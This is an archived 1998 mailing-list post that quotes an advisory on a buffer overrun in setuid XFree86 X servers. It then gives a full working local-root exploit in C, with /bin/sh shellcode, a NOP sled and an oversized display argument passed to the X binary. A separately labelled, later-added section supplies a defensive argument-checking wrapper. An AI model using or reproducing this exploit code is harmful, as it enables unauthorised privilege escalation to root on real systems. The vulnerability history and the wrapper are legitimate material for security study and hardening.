Re: Xserver stack smashed

From: Rahul Sahadevan (srahulat_private)
Date: Mon Jan 26 1998 - 05:06:36 PST


    On Tue, 13 Jan 1998, Pavel Kankovsky wrote:
    
    --------------------------------------------------------------------------
    =>On a system where X11R6-based Xserver (R5 is probably affected too) is
    =>installed setuid or setgid (e.g. typical XFree86 installation has XF86_*
    =>setuid root), local users can exploit a buffer overrun in its code and
    =>gain extra privileges (e.g. root privileges when Xserver is setuid root).
    =>Quick fix: remove setuid/setgid bit from all installed Xservers
    =>* use xdm or a safe setuid wrapper to start Xserver
    =>An actual exploit is left as an exercise for the reader. :)
    --------------------------------------------------------------------------
    
    Hi,
            Here is an x86 exploit for the recently discovered X-server buffer
    overflow. This program has been tested on most XF86 servers ( version 3.2 )
    shipped with Redhat-4.2 and on XF86_SVGA( version 3.2 and 3.3.1 ). It did
    not work on XF86_SVGA 3.1.x.
    
            Use a wrapper to check the arguments passed to the X server or use
    Solar Designer's kernel stack patch to prevent the overflow.
    
    Disclaimer:
            This program is for educational purposes only. Please do not
    misuse it. I cannot be held responsible for any damage caused by the
    use of this program by anyone.
    
    Rahul Sahadevan,
    Administrator, Dept of CS & A,
    Indian Institute of Sciences.
    
    -------------------------8<-------Xploit.c---------------------------------
    
        /**********************************************************
        * Adapted from                                            *
        *   "Smashing The Stack For Fun And Profit"               *
        *     in Phrack-49 by Aleph One ( aleph1at_private )*
        * by                                                      *
        *   Rahul Sahadevan. ( srahulat_private )         *
        **********************************************************/
    
    /* Try 2 3 4 5 for OFFSET */
    #define OFFSET 2
    
    #include <string.h>
    #include <unistd.h>
    #include <errno.h>
    
    #define LENCODE ( sizeof( Code ) )
    char Code[] =
        "\xeb\x40\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0"
        "\x3f\x89\xc2\x31\xdb\xb3\x0a\x31\xc9\xcd\x80\x89\xd0\x43\x41"
        "\xcd\x80\x89\xd0\x43\x41\xcd\x80\x31\xc0\x89\xc3\xb0\x17\xcd"
        "\x80\x31\xc0\xb0\x2e\xcd\x80\x31\xc0\xb0\x0b\x89\xf3\x8d\x4e"
        "\x08\x8d\x56\x0c\xcd\x80\xe8\xbb\xff\xff\xff/bin/sh";
    
    char Display[ 0x4001 + OFFSET ] = ":99999", *ptr = Display + OFFSET + 1;
    char *args[] = { "X", "-nolock", Display, NULL };
    
    main() {
      dup2( 0, 10 ); dup2( 1, 11 ); dup2( 2, 12 );
      __asm__("movl %%esp,(%0)\n\tsubl %1,(%0)"::"b"(ptr),"n"(LENCODE+0x2000));
      memcpy( ptr + 4, ptr, 0x3fc );
      memset( ptr + 0x400, 0x90, 0x3c00 - LENCODE );
      memcpy( ptr + 0x4000 - LENCODE, Code, LENCODE );
      execve( "/usr/X11R6/bin/X", args, args + 3 );
      perror( "execve" );
    }
    
    --------------------------------8<-----------------------------------------
    
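The wrapper approach that both posters recommend, as an added example that is not part of the original post or of XFree86: a small setuid front end that allow-lists the X server's arguments and bounds the display designator before executing the real, non-setuid server binary. The server path is the one named in the post; the option allow-list, the length limits, and the minimal environment passed to the server are assumptions for illustration.

```c
/* Added example: an argument-checking wrapper for a setuid X server.
 * Not the post's exploit and not XFree86's own code; the limits, the
 * option allow-list and the environment below are assumptions. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Assumed limits: no argument longer than this, and a display designator
 * of the form ":N" or ":N.M" with at most five digits per field. */
#define MAX_ARG_LEN 64
#define MAX_DISPLAY_DIGITS 5

/* Return 1 if arg is a well-formed display designator such as ":0" or ":1.0",
 * 0 otherwise.  A 16 KiB ":9999..." string is rejected on length alone. */
int display_arg_ok(const char *arg)
{
    size_t n = strlen(arg);
    size_t i = 1, digits = 0;

    if (n < 2 || n > MAX_ARG_LEN || arg[0] != ':')
        return 0;
    while (i < n && isdigit((unsigned char)arg[i])) { i++; digits++; }
    if (digits == 0 || digits > MAX_DISPLAY_DIGITS)
        return 0;
    if (i == n)
        return 1;                       /* ":N" */
    if (arg[i] != '.')
        return 0;
    i++; digits = 0;
    while (i < n && isdigit((unsigned char)arg[i])) { i++; digits++; }
    return i == n && digits >= 1 && digits <= MAX_DISPLAY_DIGITS;   /* ":N.M" */
}

/* Return 1 if every argument after argv[0] is either an allow-listed flag
 * or a valid display designator.  Anything else, including over-long
 * arguments, is refused. */
int args_ok(int argc, char **argv)
{
    /* Assumed allow-list of flags that take no value. */
    static const char *allowed[] = { "-nolock", "-terminate" };
    int i;

    for (i = 1; i < argc; i++) {
        const char *a = argv[i];
        size_t j;
        int ok = 0;

        if (strlen(a) > MAX_ARG_LEN)
            return 0;
        if (a[0] == ':') {
            if (!display_arg_ok(a))
                return 0;
            continue;
        }
        for (j = 0; j < sizeof allowed / sizeof allowed[0]; j++)
            if (strcmp(a, allowed[j]) == 0)
                ok = 1;
        if (!ok)
            return 0;
    }
    return 1;
}

int main(int argc, char **argv)
{
    /* Server path as named in the post; the real binary is installed
     * without the setuid bit and only this wrapper carries it. */
    static const char server[] = "/usr/X11R6/bin/X";
    /* Assumed minimal environment so the server inherits nothing from
     * the invoking user's shell. */
    char *envp[] = { "PATH=/usr/X11R6/bin:/usr/bin:/bin", NULL };

    if (!args_ok(argc, argv)) {
        fprintf(stderr, "wrapper: refusing to start %s: bad argument\n", server);
        return 1;
    }
    argv[0] = "X";
    execve(server, argv, envp);
    perror("execve");
    return 1;
}
```

The check runs before any privileged code is reached, so the oversized display string the post relies on never arrives at the server's own argument parsing; the environment reset is the usual companion precaution for setuid front ends.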